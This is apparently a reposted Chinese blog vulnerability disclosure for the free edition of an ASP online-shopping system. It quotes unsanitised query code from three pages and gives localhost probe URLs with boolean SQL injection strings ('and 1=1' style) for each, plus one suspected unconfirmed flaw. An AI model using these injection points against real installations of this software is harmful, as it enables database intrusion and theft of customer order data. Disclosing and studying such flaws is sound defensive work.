我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息网趣网上购物系统旗舰版(免费版)SQL注入漏洞
网趣网上购物系统旗舰版(免费版)SQL注入漏洞
3052
0推荐
0评论

版本:网趣网上购物系统旗舰版(免费版)

下载:http://www.cnhww.com/down.asp?id=6

----------------------------------------------------------------------

第一处:

/research.asp

对selectname未进行任何过滤,造成搜索型注入

code:

7-12行

    dim action,searchkey,anclassid,jiage,selectnameanclassid=request("anclassid")searchkey=request("searchkey")jiage=request("jiage")action=request("action")selectname=request("selectname")//获取selectname,中间无任何过滤

212-230行

    if anclassid<>0thenselectcase actioncase"1"sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") andanclassid="&anclassid&" "case"2"sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") andanclassid="&anclassid&" "case"3"sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") andanclassid="&anclassid&" "endselectelseselectcase actioncase"1"sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "case"2"sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "//我利用的是此处case"3"sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "endselectendif

234行

    rs.open "select * from products where "&sql1&"  and zhuangtai=0 order by adddate desc",conn,1,1

构造:

http://127.0.0.1:8080/research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'='

--------------------------------------------------------------------

第二处:

/price.asp

对anid未进行任何过滤,造成数字型注入

code:

74行:

    anid=trim(request("anid"))//获取anid,中间无任何过滤

104行:

    if anid<>""thenrs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

构造:

http://127.0.0.1:8080/price.asp?anid=62 and 1=1

---------------------------------------------------------------------

第三处:

/order.asp

对dan未进行任何过滤,造成字符型注入

code:

64行:

    dingdan=request.QueryString("dan")//获取dan,中间无任何过滤

66行:

    rs.open "selectproducts.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liuyan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodizhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid whereorders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"' ",conn,1,1

构造:

下笔订单先,否者无法利用

http://127.0.0.1:8080/order.asp?dan=201277143453' and '1'='1

----------------------------------------------------------------------

第四处:

/my_msg.asp

对delid未进行任何过滤(我用的免费版,无法测试,不过有很大可能存在该漏洞)

----------------------------------------------------------------------

转自:http://www.90sec.org/thread-3089-1-1.html

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415